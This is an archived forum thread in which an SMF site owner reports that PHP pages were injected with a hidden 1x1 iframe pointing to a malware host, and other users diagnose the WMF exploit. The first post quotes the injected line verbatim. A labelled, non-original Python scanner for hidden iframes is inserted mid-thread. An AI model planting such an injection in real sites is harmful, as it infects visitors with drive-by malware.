Simple Machines Community Forum

Customizing SMF => SMF Coding Discussion => Topic started by: joeshmo - January 04, 2006, 04:28:41 PM

Title: Hmm, seems to be a virus when we updated to smf rc2
Post by: joeshmo - January 04, 2006, 04:28:41 PM
It added an extra bit of code to almost every .php page that triggers a virus download from another site. Check it out here: *linksnipped*
<? echo ('<html><head><title></title></head><body><iframe src="http://www.blackh.info/traff/" width=1 height=1></iframe></body></html>');?>

The link in the above sends you a virus download that looks like it came from our site. Help please! We did not have this problem in any past version of smf and it doesn't look like anything is already on the forums.
Title: Re: Hmm, seems to be a virus when we updated to smf rc2
Post by: Skipdawg - January 04, 2006, 06:23:17 PM
Do not click on his link if you don't have a very good and solid firewall and antivirus!

Took me about 5 minutes to clean up the mess. That board should be disabled till problem fixed!
Title: Re: Hmm, seems to be a virus when we updated to smf rc2
Post by: Trekkie101 - January 04, 2006, 06:26:14 PM
How touching, the WMF exploit.

Next Windows update will fix that :)
Title: Re: Hmm, seems to be a virus when we updated to smf rc2
Post by: sg3524 - January 04, 2006, 06:28:07 PM
This is absolutely not coming from your RC2 code.  It may exist elsewhere on your site though.

It's a popular form of attack now taking place out there.  Look for .htaccess files that have been modified, or that you did not put there.

Let me know if you find any.  I can give you some hints about how to protect yourself.

GRAM
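
Added example, not part of the original thread or any poster's code: a Python sketch of the two checks discussed above, flagging web files that contain a hidden iframe like the injected line quoted in the first post and listing every .htaccess file with its modification time for manual review. The function names and the "width and height both 0 or 1" heuristic are assumptions made for this example.

```python
import os
import re
import sys
import time

# Assumption: "hidden" means width and height are both 0 or 1, as in the quoted line.
IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.IGNORECASE)
TINY_DIM_RE = re.compile(rb"""\b(width|height)\s*=\s*["']?([01])(?![\d.%])""", re.IGNORECASE)
SRC_RE = re.compile(rb"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
WEB_EXTENSIONS = (".php", ".html", ".htm", ".shtml")


def hidden_iframes(data):
    """Return the src of each iframe tag in data whose width and height are 0 or 1."""
    hits = []
    for tag in IFRAME_RE.findall(data):
        dims = {m.group(1).lower() for m in TINY_DIM_RE.finditer(tag)}
        if dims == {b"width", b"height"}:
            src = SRC_RE.search(tag)
            hits.append(src.group(1).decode("latin-1") if src else "")
    return hits


def scan_tree(root):
    """Walk root and return (iframe_hits, htaccess_files), both sorted by path."""
    iframe_hits, htaccess_files = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == ".htaccess":
                # Reported for manual review: was it modified, or not put there by you?
                htaccess_files.append((path, os.path.getmtime(path)))
            elif name.lower().endswith(WEB_EXTENSIONS):
                with open(path, "rb") as fh:
                    for src in hidden_iframes(fh.read()):
                        iframe_hits.append((path, src))
    return sorted(iframe_hits), sorted(htaccess_files)


if __name__ == "__main__":
    hits, htaccess = scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path, src in hits:
        print(f"HIDDEN IFRAME  {path}  ->  {src}")
    for path, mtime in htaccess:
        stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime))
        print(f".htaccess      {path}  modified {stamp}")
    sys.exit(1 if hits else 0)
```

Run it against the web root; a non-zero exit status means at least one file carries a hidden iframe and should be compared with a clean copy of the package.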
Title: Re: Hmm, seems to be a virus when we updated to smf rc2
Post by: Thantos - January 04, 2006, 06:31:32 PM
Quote from: Trekkie101 - January 04, 2006, 06:26:14 PM
How touching, the WMF exploit.

Next Windows update will fix that :)
So 3 years? :)

I removed the link given and posted it in a moderator area.  We don't want any of our users accidentally infected.
Title: Re: Hmm, seems to be a virus when we updated to smf rc2
Post by: Trekkie101 - January 04, 2006, 06:35:22 PM
Quote from: MikeMill - January 04, 2006, 06:31:32 PM
Quote from: Trekkie101 - January 04, 2006, 06:26:14 PM
How touching, the WMF exploit.

Next Windows update will fix that :)
So 3 years? :)

I removed the link given and posted it in a moderator area.  We don't want any of our users accidentally infected.

Lol no, I meant the next patch, Windows update.

Firefox, Opera aren't affected unless you choose to save it.
Title: Re: Hmm, seems to be a virus when we updated to smf rc2
Post by: Trekkie101 - January 04, 2006, 06:40:48 PM
I've tracked through all the iframes, and reported the site to the webhost. www.ev1.net

Hopefully their abuse center will deal with it.
Title: Re: Hmm, seems to be a virus when we updated to smf rc2
Post by: joeshmo - January 04, 2006, 07:15:10 PM
Yeah, sorry bout the link. Firefox opens a zillion downloads called password.wmf. I made the area off limits to all users to prevent people from getting a virus.
Htdocs don't appear to be changed. It just says this really:

Quote
<Files 403.shtml>
order allow,deny
allow from all
</Files>

I really don't see anything changed, though I am changing my password for safety and stuff. Should I just upload smf rc2 again?
Title: Re: Hmm, seems to be a virus when we updated to smf rc2
Post by: JayBachatero - January 04, 2006, 08:37:02 PM
I think you should just wait until it's cleared or it will continue to happen.

-JayBachatero